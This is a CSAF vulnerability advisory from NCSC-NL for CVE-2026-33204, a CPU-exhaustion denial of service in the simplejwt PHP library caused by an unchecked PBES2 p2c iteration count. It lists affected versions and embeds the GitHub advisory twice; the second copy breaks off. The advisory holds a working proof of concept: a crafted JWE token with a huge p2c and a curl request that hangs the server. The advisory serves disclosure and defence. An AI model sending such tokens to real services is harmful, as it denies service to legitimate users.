{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or being kept up to date in real time. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability to use the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33204",
        "tracking": {
            "current_release_date": "2026-03-29T16:14:34.706964Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33204",
            "initial_release_date": "2026-03-18T20:44:16.986125Z",
            "revision_history": [
                {
                    "date": "2026-03-18T20:44:16.986125Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-18T20:44:29.750842Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-19T11:39:54.368222Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-20T23:25:34.645427Z",
                    "number": "4",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-20T23:25:38.328274Z",
                    "number": "5",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T23:38:55.185584Z",
                    "number": "6",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-20T23:38:59.515140Z",
                    "number": "7",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-21T15:23:09.187828Z",
                    "number": "8",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-23T12:30:09.470810Z",
                    "number": "9",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| Product Identifiers created (1).| Product Remediations created (5).| Products created (4).| References created (4).| CWES updated (1).| Vendor_assessment created."
                },
                {
                    "date": "2026-03-23T12:30:14.446811Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T20:51:26.120573Z",
                    "number": "11",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-25T18:42:07.685126Z",
                    "number": "12",
                    "summary": "References created (2)."
                },
                {
                    "date": "2026-03-25T18:42:10.366665Z",
                    "number": "13",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-26T00:39:38.748570Z",
                    "number": "14",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (42).| Product Identifiers created (41).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-26T00:39:43.350529Z",
                    "number": "15",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-29T03:16:22.662720Z",
                    "number": "16",
                    "summary": "References removed (2)."
                },
                {
                    "date": "2026-03-29T16:14:30.178390Z",
                    "number": "17",
                    "summary": "References created (2)."
                }
            ],
            "status": "interim",
            "version": "17"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/2",
                                "product": {
                                    "name": "vers:rpm/2",
                                    "product_id": "CSAFPID-1508257",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:ansible_automation_platform:2"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Ansible Automation Platform 2"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5891494"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "python-djangorestframework-simplejwt"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5891491"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "python3.11-djangorestframework-simplejwt"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5891492"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "python3.12-djangorestframework-simplejwt"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5891493"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "python3x-djangorestframework-simplejwt"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Ansible Automation Platform 2"
                    }
                ],
                "category": "vendor",
                "name": "Red Hat"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<1.1.1",
                                "product": {
                                    "name": "vers:unknown/<1.1.1",
                                    "product_id": "CSAFPID-5878157"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<1.1.1",
                                "product": {
                                    "name": "vers:unknown/>=0|<1.1.1",
                                    "product_id": "CSAFPID-5912979"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.1.0",
                                "product": {
                                    "name": "vers:unknown/v0.1.0",
                                    "product_id": "CSAFPID-5912938",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.1.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.1.1",
                                "product": {
                                    "name": "vers:unknown/v0.1.1",
                                    "product_id": "CSAFPID-5912939",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.1.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.1.2",
                                "product": {
                                    "name": "vers:unknown/v0.1.2",
                                    "product_id": "CSAFPID-5912940",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.1.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.1.3",
                                "product": {
                                    "name": "vers:unknown/v0.1.3",
                                    "product_id": "CSAFPID-5912941",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.1.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.1.4",
                                "product": {
                                    "name": "vers:unknown/v0.1.4",
                                    "product_id": "CSAFPID-5912942",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.1.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.1.5",
                                "product": {
                                    "name": "vers:unknown/v0.1.5",
                                    "product_id": "CSAFPID-5912943",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.1.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.1.6",
                                "product": {
                                    "name": "vers:unknown/v0.1.6",
                                    "product_id": "CSAFPID-5912944",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.1.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.2.1",
                                "product": {
                                    "name": "vers:unknown/v0.2.1",
                                    "product_id": "CSAFPID-5912945",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.2.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.2.2",
                                "product": {
                                    "name": "vers:unknown/v0.2.2",
                                    "product_id": "CSAFPID-5912946",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.2.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.2.3",
                                "product": {
                                    "name": "vers:unknown/v0.2.3",
                                    "product_id": "CSAFPID-5912947",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.2.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.2.4",
                                "product": {
                                    "name": "vers:unknown/v0.2.4",
                                    "product_id": "CSAFPID-5912948",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.2.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.2.5",
                                "product": {
                                    "name": "vers:unknown/v0.2.5",
                                    "product_id": "CSAFPID-5912949",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.2.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.3.0",
                                "product": {
                                    "name": "vers:unknown/v0.3.0",
                                    "product_id": "CSAFPID-5912950",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.3.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.3.1",
                                "product": {
                                    "name": "vers:unknown/v0.3.1",
                                    "product_id": "CSAFPID-5912951",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.3.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.4.0",
                                "product": {
                                    "name": "vers:unknown/v0.4.0",
                                    "product_id": "CSAFPID-5912952",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.4.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.4.1",
                                "product": {
                                    "name": "vers:unknown/v0.4.1",
                                    "product_id": "CSAFPID-5912953",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.4.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.4.2",
                                "product": {
                                    "name": "vers:unknown/v0.4.2",
                                    "product_id": "CSAFPID-5912954",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.4.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.5.0",
                                "product": {
                                    "name": "vers:unknown/v0.5.0",
                                    "product_id": "CSAFPID-5912955",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.5.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.5.1",
                                "product": {
                                    "name": "vers:unknown/v0.5.1",
                                    "product_id": "CSAFPID-5912956",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.5.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.5.2",
                                "product": {
                                    "name": "vers:unknown/v0.5.2",
                                    "product_id": "CSAFPID-5912957",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.5.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.5.3",
                                "product": {
                                    "name": "vers:unknown/v0.5.3",
                                    "product_id": "CSAFPID-5912958",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.5.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.6.0",
                                "product": {
                                    "name": "vers:unknown/v0.6.0",
                                    "product_id": "CSAFPID-5912959",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.6.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.6.0-rc.1",
                                "product": {
                                    "name": "vers:unknown/v0.6.0-rc.1",
                                    "product_id": "CSAFPID-5912960",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.6.0-rc.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.6.0-rc.2",
                                "product": {
                                    "name": "vers:unknown/v0.6.0-rc.2",
                                    "product_id": "CSAFPID-5912961",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.6.0-rc.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.6.1",
                                "product": {
                                    "name": "vers:unknown/v0.6.1",
                                    "product_id": "CSAFPID-5912962",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.6.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.6.2",
                                "product": {
                                    "name": "vers:unknown/v0.6.2",
                                    "product_id": "CSAFPID-5912963",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.6.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.6.3",
                                "product": {
                                    "name": "vers:unknown/v0.6.3",
                                    "product_id": "CSAFPID-5912964",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.6.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.7.0",
                                "product": {
                                    "name": "vers:unknown/v0.7.0",
                                    "product_id": "CSAFPID-5912965",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.7.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.7.1",
                                "product": {
                                    "name": "vers:unknown/v0.7.1",
                                    "product_id": "CSAFPID-5912966",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.7.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.8.0",
                                "product": {
                                    "name": "vers:unknown/v0.8.0",
                                    "product_id": "CSAFPID-5912967",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.8.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.8.1",
                                "product": {
                                    "name": "vers:unknown/v0.8.1",
                                    "product_id": "CSAFPID-5912968",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.8.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.8.2",
                                "product": {
                                    "name": "vers:unknown/v0.8.2",
                                    "product_id": "CSAFPID-5912969",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.8.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.9.0",
                                "product": {
                                    "name": "vers:unknown/v0.9.0",
                                    "product_id": "CSAFPID-5912970",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.9.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.9.1",
                                "product": {
                                    "name": "vers:unknown/v0.9.1",
                                    "product_id": "CSAFPID-5912971",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.9.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.9.2",
                                "product": {
                                    "name": "vers:unknown/v0.9.2",
                                    "product_id": "CSAFPID-5912972",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.9.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.9.3",
                                "product": {
                                    "name": "vers:unknown/v0.9.3",
                                    "product_id": "CSAFPID-5912973",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v0.9.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.0.0",
                                "product": {
                                    "name": "vers:unknown/v1.0.0",
                                    "product_id": "CSAFPID-5912974",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v1.0.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.0.1",
                                "product": {
                                    "name": "vers:unknown/v1.0.1",
                                    "product_id": "CSAFPID-5912975",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v1.0.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.0.2",
                                "product": {
                                    "name": "vers:unknown/v1.0.2",
                                    "product_id": "CSAFPID-5912976",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v1.0.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.0.3",
                                "product": {
                                    "name": "vers:unknown/v1.0.3",
                                    "product_id": "CSAFPID-5912977",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v1.0.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.1.0",
                                "product": {
                                    "name": "vers:unknown/v1.1.0",
                                    "product_id": "CSAFPID-5912978",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/kelvinmo/simplejwt@v1.1.0"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "simplejwt"
                    }
                ],
                "category": "vendor",
                "name": "kelvinmo"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33204",
            "cwe": {
                "id": "CWE-325",
                "name": "Missing Cryptographic Step"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "## Summary\n\nAn unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used.  \nApplications that call `JWE::decrypt()` on attacker-controlled JWEs using PBES2 algorithms are affected.\n\n## Details\n\nPHP version: `PHP 8.4.11`\nSimpleJWT version: `v1.1.0`\n\nThe relevant portion of the vulnerable implementation is shown below ([PBES2.php](https://github.com/kelvinmo/simplejwt/blob/edb7807a240b72c59e72d7dca31add9d16555f9f/src/SimpleJWT/Crypt/KeyManagement/PBES2.php)):\n\n```PHP\n<?php\n/* ... SNIP ... */\nclass PBES2 extends BaseAlgorithm implements KeyEncryptionAlgorithm {\n    use AESKeyWrapTrait;\n\n    /** @var array<string, mixed> $alg_params */\n    static protected $alg_params = [\n        'PBES2-HS256+A128KW' => ['hash' => 'sha256'],\n        'PBES2-HS384+A192KW' => ['hash' => 'sha384'],\n        'PBES2-HS512+A256KW' => ['hash' => 'sha512']\n    ];\n\n    /** @var truthy-string $hash_alg */\n    protected $hash_alg;\n\n    /** @var int $iterations */\n    protected $iterations = 4096;\n    \n    /* ... SNIP ... */\n\n    /**\n     * Sets the number of iterations to use in PBKFD2 key generation.\n     *\n     * @param int $iterations number of iterations\n     * @return void\n     */\n    public function setIterations(int $iterations) {\n        $this->iterations = $iterations;\n    }\n    \n    /* ... SNIP ... 
*/\n\n    /**\n     * {@inheritdoc}\n     */\n    public function decryptKey(string $encrypted_key, KeySet $keys, array $headers, ?string $kid = null): string {\n        /** @var SymmetricKey $key */\n        $key = $this->selectKey($keys, $kid);\n        if ($key == null) {\n            throw new CryptException('Key not found or is invalid', CryptException::KEY_NOT_FOUND_ERROR);\n        }\n        if (!isset($headers['p2s']) || !isset($headers['p2c'])) {\n            throw new CryptException('p2s or p2c headers not set', CryptException::INVALID_DATA_ERROR);\n        }\n\n        $derived_key = $this->generateKeyFromPassword($key->toBinary(), $headers);\n        return $this->unwrapKey($encrypted_key, $derived_key, $headers);\n    }\n    \n    /* ... SNIP ... */\n\n    /**\n     * @param array<string, mixed> $headers\n     */\n    private function generateKeyFromPassword(string $password, array $headers): string {\n        $salt = $headers['alg'] . \"\\x00\" . Util::base64url_decode($headers['p2s']);\n        /** @var int<0, max> $length */\n        $length = intdiv($this->getAESKWKeySize(), 8);\n\n        return hash_pbkdf2($this->hash_alg, $password, $salt, $headers['p2c'], $length, true);\n    }\n}\n?>\n```\n\nThe security flaw lies in the lack of input validation when handling JWEs that use PBES2.  \nA \"sanity ceiling\" is not set on the iteration count, which is the parameter known in the JWE specification as `p2c` ([RFC7518](https://datatracker.ietf.org/doc/html/rfc7518#section-4.8.1.2)).  \nThe library calls `decryptKey()` with the untrusted input `$headers`, which then uses the PHP function `hash_pbkdf2()` with the user-supplied value `$headers['p2c']`.\n\nThis results in an algorithmic-complexity denial-of-service (CPU exhaustion) because the PBKDF2 iteration count is fully attacker-controlled.  
\nBecause the header is processed before successful decryption and authentication, the attack can be triggered using an invalid JWE, meaning authentication is not required.\n\n## Proof of Concept\n\nSpin up a simple PHP server which accepts a JWE as input and tries to decrypt the user supplied JWE.\n\n```bash\nmkdir simplejwt-poc\ncd simplejwt-poc\ncomposer install\ncomposer require kelvinmo/simplejwt\nphp -S localhost:8000\n```\n\nThe content of `index.php`:\n\n```php\n<?php\n\nrequire __DIR__ . '/vendor/autoload.php';\n\n$set = SimpleJWT\\Keys\\KeySet::createFromSecret('secret123');\n\n$uri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);\n$method = $_SERVER['REQUEST_METHOD'];\n\nif ($uri === '/encrypt' && $method === 'GET') {\n    // Note $headers['alg'] and $headers['enc'] are required\n    $headers = ['alg' => 'PBES2-HS256+A128KW', 'enc' => 'A256CBC-HS512'];\n    $plaintext = 'This is the plaintext I want to encrypt.';\n    $jwe = new SimpleJWT\\JWE($headers, $plaintext);\n\n    try {\n        echo \"Encrypted JWE: \" . $jwe->encrypt($set);\n    } catch (\\RuntimeException $e) {\n        echo $e;\n    }\n}\n\nelseif ($uri === '/decrypt' && $method === 'GET') {\n    try {\n        $jwe = $_GET['s'];\n        $jwe = SimpleJWT\\JWE::decrypt($jwe, $set, 'PBES2-HS256+A128KW');\n    } catch (SimpleJWT\\InvalidTokenException $e) {\n        echo $e;\n    }\n    echo $jwe->getHeader('alg') . \"<br>\";\n    echo $jwe->getHeader('enc') . \"<br>\";\n    echo $jwe->getPlaintext() . 
\"<br>\";\n    }\n\nelse {\n    http_response_code(404);\n    echo \"Route not found\";\n}\n\n?>\n```\n\nWe have to craft a JWE (even unsigned and unencrypted) with this header, notice the extremely large p2c value (more than 400 billion iterations):\n\n```json\n{\n    \"alg\": \"PBES2-HS256+A128KW\",\n    \"enc\": \"A128CBC-HS256\",\n    \"p2s\": \"blablabla\",\n    \"p2c\": 409123223136\n}\n```\n\nThe final JWE with poisoned header: `eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla`.\n\nNotice that only the header needs to be valid Base64URL JSON, the remaining JWE segments can contain arbitrary data.\n\nPerform the following request to the server (which tries to derive the PBES2 key):\n\n```bash\ncurl --path-as-is -i -s -k -X $'GET' \\\n    -H $'Host: localhost:8000' \\\n    $'http://localhost:8000/decrypt?s=eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla'\n```\n\nThe request blocks the worker until the PHP execution timeout is reached, shutting down the server:\n\n```console\n[Sun Mar 15 11:42:18 2026] PHP 8.4.11 Development Server (http://localhost:8000) started\n[Sun Mar 15 11:42:20 2026] 127.0.0.1:38532 Accepted\n\nFatal error: Maximum execution time of 30+2 seconds exceeded (terminated) in /home/edoardottt/hack/test/simplejwt-poc/vendor/kelvinmo/simplejwt/src/SimpleJWT/Crypt/KeyManagement/PBES2.php on line 168\n```\n\n## Impact\n\nAn attacker can send a crafted JWE with an extremely large `p2c` value to force the server to perform a very large number of PBKDF2 iterations.  \nThis causes excessive CPU consumption during key derivation and blocks the request worker until execution limits are reached.  \nRepeated requests can exhaust server resources and make the application unavailable to legitimate users.\n\n## Credits \n\nEdoardo Ottavianelli (@edoardottt)",
                    "title": "github - https://github.com/advisories/GHSA-xw36-67f8-339x"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nAn unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used.  \nApplications that call `JWE::decrypt()` on attacker-controlled JWEs using PBES2 algorithms are affected.\n\n## Details\n\nPHP version: `PHP 8.4.11`\nSimpleJWT version: `v1.1.0`\n\nThe relevant portion of the vulnerable implementation is shown below ([PBES2.php](https://github.com/kelvinmo/simplejwt/blob/edb7807a240b72c59e72d7dca31add9d16555f9f/src/SimpleJWT/Crypt/KeyManagement/PBES2.php)):\n\n```PHP\n<?php\n/* ... SNIP ... */\nclass PBES2 extends BaseAlgorithm implements KeyEncryptionAlgorithm {\n    use AESKeyWrapTrait;\n\n    /** @var array<string, mixed> $alg_params */\n    static protected $alg_params = [\n        'PBES2-HS256+A128KW' => ['hash' => 'sha256'],\n        'PBES2-HS384+A192KW' => ['hash' => 'sha384'],\n        'PBES2-HS512+A256KW' => ['hash' => 'sha512']\n    ];\n\n    /** @var truthy-string $hash_alg */\n    protected $hash_alg;\n\n    /** @var int $iterations */\n    protected $iterations = 4096;\n    \n    /* ... SNIP ... */\n\n    /**\n     * Sets the number of iterations to use in PBKFD2 key generation.\n     *\n     * @param int $iterations number of iterations\n     * @return void\n     */\n    public function setIterations(int $iterations) {\n        $this->iterations = $iterations;\n    }\n    \n    /* ... SNIP ... 
*/\n\n    /**\n     * {@inheritdoc}\n     */\n    public function decryptKey(string $encrypted_key, KeySet $keys, array $headers, ?string $kid = null): string {\n        /** @var SymmetricKey $key */\n        $key = $this->selectKey($keys, $kid);\n        if ($key == null) {\n            throw new CryptException('Key not found or is invalid', CryptException::KEY_NOT_FOUND_ERROR);\n        }\n        if (!isset($headers['p2s']) || !isset($headers['p2c'])) {\n            throw new CryptException('p2s or p2c headers not set', CryptException::INVALID_DATA_ERROR);\n        }\n\n        $derived_key = $this->generateKeyFromPassword($key->toBinary(), $headers);\n        return $this->unwrapKey($encrypted_key, $derived_key, $headers);\n    }\n    \n    /* ... SNIP ... */\n\n    /**\n     * @param array<string, mixed> $headers\n     */\n    private function generateKeyFromPassword(string $password, array $headers): string {\n        $salt = $headers['alg'] . \"\\x00\" . Util::base64url_decode($headers['p2s']);\n        /** @var int<0, max> $length */\n        $length = intdiv($this->getAESKWKeySize(), 8);\n\n        return hash_pbkdf2($this->hash_alg, $password, $salt, $headers['p2c'], $length, true);\n    }\n}\n?>\n```\n\nThe security flaw lies in the lack of input validation when handling JWEs that use PBES2.  \nA \"sanity ceiling\" is not set on the iteration count, which is the parameter known in the JWE specification as `p2c` ([RFC7518](https://datatracker.ietf.org/doc/html/rfc7518#section-4.8.1.2)).  \nThe library calls `decryptKey()` with the untrusted input `$headers`, which then uses the PHP function `hash_pbkdf2()` with the user-supplied value `$headers['p2c']`.\n\nThis results in an algorithmic-complexity denial-of-service (CPU exhaustion) because the PBKDF2 iteration count is fully attacker-controlled.  
